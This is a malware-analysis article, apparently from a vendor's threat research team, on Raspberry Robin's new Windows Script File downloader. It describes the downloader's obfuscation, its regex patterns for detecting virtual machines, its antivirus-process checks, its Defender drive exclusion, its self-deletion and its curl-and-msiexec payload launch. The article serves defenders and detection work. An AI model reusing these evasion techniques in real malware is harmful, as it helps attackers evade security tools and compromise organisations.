First identified in late 2021, Raspberry Robin is a Windows worm initially seen targeting technology and manufacturing organizations. It has since grown to become one of the most prevalent threats facing enterprises. In March, the HP Threat Research team identified a change in the way cybercriminals are spreading Raspberry Robin. The malware is now being delivered through Windows Script Files (WSF). The scripts are highly obfuscated and use a range of anti-analysis techniques, enabling the malware to evade detection. Historically, Raspberry Robin was known to spread through removable media like USB drives, but its distributors have also experimented with other initial infection file types. In this article, we’ll share the background on Raspberry Robin, document the new infection method and how to analyze the downloader script.
What is Raspberry Robin?
Raspberry Robin is known for its heavy obfuscation and anti-analysis techniques to bypass detection, fool sandboxes, and slow down security teams seeking to understand the malware. Following infection, the malware communicates with its command and control (C2) servers over Tor. Raspberry Robin is capable of downloading and executing additional payloads, acting as a foothold for threat actors to deliver other malicious files. The malware has been used to deliver families including SocGholish, Cobalt Strike, IcedID, BumbleBee and Truebot, as well as being a precursor of ransomware.
Initial Infection Evolution
Since 2021, threat actors spreading Raspberry Robin have used different methods to infect endpoints:
- USB devices containing malicious Windows Shortcut Files (.lnk). The shortcut files run Windows Installer commands using msiexec.exe (T1218.007) that download the payload from compromised QNAP network-attached storage (T1584.004) devices.
- Archive files (RAR) hosted on Discord (T1102). Each RAR file contains an EXE and a DLL file. The EXE is a legitimate signed binary and uses DLL side-loading (T1574.002) to load and run the malicious payload DLL.
- 7-Zip (.7z) archive files downloaded using the victim’s web browser. Each archive contains a malicious Windows Installer (.msi) package (T1218.007) that infects the PC with Raspberry Robin.
- Malicious adverts (T1583.008), that when clicked on, download malicious ZIP files hosted on Discord (T1102) that lead to Raspberry Robin.
Raspberry Robin’s Latest Infection Method: Windows Script Files
Raspberry Robin has long been known to spread as a USB worm. At the beginning of this year, cybercriminals spread the malware through archive files via web downloads. In campaigns since early March 2024, however, its distributors swapped archive files with Windows Script Files (.wsf). These files are widely used by administrators and legitimate software to automate tasks within Windows but can also be abused by attackers (T1059). The WSF file format supports scripting languages, such as JScript and VBScript, that are interpreted by the Windows Script Host component built into the Windows operating system.
The Windows Script Files are offered for download via various malicious domains and subdomains controlled by the attackers. It’s not clear how threat actors are luring users to the malicious URLs. However, this could be via spam or malvertising campaigns.
The script file acts as a downloader. Like the Raspberry Robin DLL, the script uses a variety of anti-analysis and virtual machine (VM) detection techniques. The final payload is only downloaded and executed when all these evaluation steps indicate that the malware is running on a real end user device, rather than in a sandbox. The scripts are highly obfuscated. At the time of analysis, they were not classified as malicious by any anti-virus scanners on VirusTotal (Figure 1), demonstrating the evasiveness of the malware.
Figure 1 – Raspberry Robin WSF downloader with a 0% detection rate on VirusTotal.
Technical Analysis of the WSF Downloader
If the Windows script file is opened in a text editor, most of the characters are unreadable. These junk characters serve as a distraction to hide the actual script, and potentially convince anyone inspecting the file that it is not a script file at all.
Figure 2 – Junk characters in Raspberry Robin WSF downloader.
Further down in the file, there are script tags that define the start of the file. Similarly, at the end of the file there is a closing script tag followed by more junk characters.
Figure 3 – Opening script tag.
The start of the actual script can be found a few lines further down. This begins with a variable declaration. An array is used repeatedly throughout the script to decode individual program steps.
Figure 4 – Array that is used to decode the program.
The script is heavily obfuscated and does not immediately reveal its functionality. All functions and variables used are encoded and decoded via a function using the array shown in Figure 4 at runtime. Moreover, the control flow of the program is also obfuscated. In this case, the attacker uses a while loop with a switch case statement contained in it. The flow of the program is defined by a dynamically calculated array of integers.
Figure 5 – Example of control flow using while loop with switch case statements.
We found that each switch case statement contains only a few relevant code sequences. Usually, two such sequences are used for iterating through an enumerator of objects and a third sequence for evaluating it.
Initially, the malware creates a WScript shell object that allows it to interact with the operating system and is used again and again as the script progresses.
Figure 6 – Creation of WScript shell object.
The first anti-analysis technique checks whether the script is located on the user’s Desktop. If this is the case, the script terminates.
Figure 7 – Check file is saved on Desktop.
If the script continues to run, a SWbemLocator object is created. This object gives the script access to Windows Management Instrumentation (WMI), which can be used to query a wide range of system information.
Figure 8 – Creation of SWbemLocator object.
Figure 9 – Connect to WMI namespace using ConnectServer method.
The script uses this object to perform the following checks and terminates the script if they are true:
1. The script checks whether the build number of the operating system is lower than 17063. Windows 10 build 17063 was an Insider Preview build released in December 2017.
Figure 10 – Check OS build number.
2. Next, the script checks if the processor matches patterns indicating that it is running inside a virtual machine or on a server, rather than on an end user device. (/xEoN|bROAd|qEmu|kVM|EPyC/i)
Figure 11 – Check processor vendor and type.
3. If the video controller corresponds to the pattern “/vmBUs|040515ad|11001aF4/i”, this indicates that the infected client is virtualized. The Raspberry Robin script checks for Hyper-V, VMWare and VirtualBox.
Figure 12 – Check video controller.
4. The script checks the temperature of the CPU by using WMI to access the “Win32_PerfFormattedData_Counters_ThermalZoneInformation” class. Since the temperature will be greater than 0 on non-virtualized devices, this is a simple check to see if the system is virtualized.
Figure 13 – CPU temperature check.
5. The script also uses the classic method for identifying if the runtime environment is virtualized by checking the MAC address of the network card. The script tries to detect the following virtualization solutions:
- Hyper-V
- KVM
- Parallels, Inc.
- Oracle Virtual Iron
- Oracle VM Server
- QEMU
- VMWare
- VirtualBox
- Virtual PC
- Xen
Figure 14 – Check network card vendor against certain patterns.
6. As the last WMI check, the running processes are listed and compared against a list of known anti-virus processes. The malware checks for the following security software vendors:
- Kaspersky
- ESET
- Avast
- Avira
- Check Point
- Bitdefender
Figure 15 – Check for certain anti-virus processes.
After these steps, the VM detection of the script is complete. However, in addition to ensuring that the malware runs on a real victim device, the script also implements measures to prevent it from being analyzed. The obfuscation makes analyzing the script somewhat more difficult and time-consuming.
Since there is a large amount of unused code in the script, one strategy to speed up analysis is to identify which code is actually used and remove the unused parts. This makes the script clearer and allows the analyst to focus on the important code sequences. Knowing this, the script’s authors placed an inconspicuous variable assignment in the middle of the unused code. Accidentally removing the variable assignment, which is set to 0, causes the script to terminate. An if statement checks whether the variable is set and if this is the case, the script stops.
Figure 16 – Check for a variable hidden among unused code.
Care must therefore be taken when refactoring and analyzing the script to ensure that it will still run afterwards. However, caution is also required with dynamic analysis because the malware restarts the script in the code sequence shown in Figure 17 with two command line arguments. If the script is analyzed in a debugger, the malware “breaks out” using this method, since a new process is started.
Figure 17 – Code sequence that restarts the script with command line arguments.
If the script is restarted, the script identifies the arguments provided and continues to run. Next, a command deletes the script from the disk (Figure 18). At this point, the running code can therefore only be found in memory. It is important to have a backup copy of the script or to interrupt the delete command before it is executed.
Figure 18 – Deletion of the script from hard disk.
In a previous step, the script checks for processes associated with six anti-virus vendors and stops running if they are found. Given this, the script is more likely to be running on an endpoint protected by Microsoft Defender. To evade detection, the script adds an exception to Microsoft Defender that excludes the entire main drive from anti-virus scanning.
Figure 19 – Add exclusion to Microsoft Defender.
All these checks give the threat actors assurance that the malware is running on a real end user device. Additionally, the Defender exception significantly reduces the likelihood of the subsequent malware stages being detected. The script now downloads the Raspberry Robin DLL from the web using the curl command and stores it in the local AppData folder.
Figure 20 – Command that downloads Raspberry Robin DLL to AppData folder.
The request is not identified by the domain using the URL path, as is usually the case, but through a cookie. This enables the web server to verify that the request originates from the downloader script. This way, the malware’s operators reduce the leakage of samples to researchers seeking to analyze Raspberry Robin.
Figure 21 – Command that runs the Raspberry Robin DLL.
Finally, the file’s extension is changed to “.dll” and run using msiexec. This starts the Raspberry Robin malware, which runs through additional sequences of anti-analysis and VM detection techniques until the effective payload is finally executed.
Conclusion
This recent activity represents the latest in a series of shifts in the way Raspberry Robin is distributed. Although best known for spreading through USB drives, threat actors deploying Raspberry Robin have been using different infection vectors such as web downloads to achieve their objectives. The WSF downloader is heavily obfuscated and uses a large range of anti-analysis and anti-VM techniques, enabling the malware to evade detection and slow down analysis. This is particularly concerning given that Raspberry Robin has been used as a precursor for human-operated ransomware. Countering this malware early on in its infection chain should be a high priority for security teams.
Indicators of Compromise
We have published the following artifacts on the HP Threat Research GitHub to help the security community detect and mitigate this threat:
- IOCs associated with Raspberry Robin WSF campaign activity
- A YARA rule to detect the Raspberry Robin WSF downloader
- Python scripts to automate the analysis of the Raspberry Robin WSF downloader
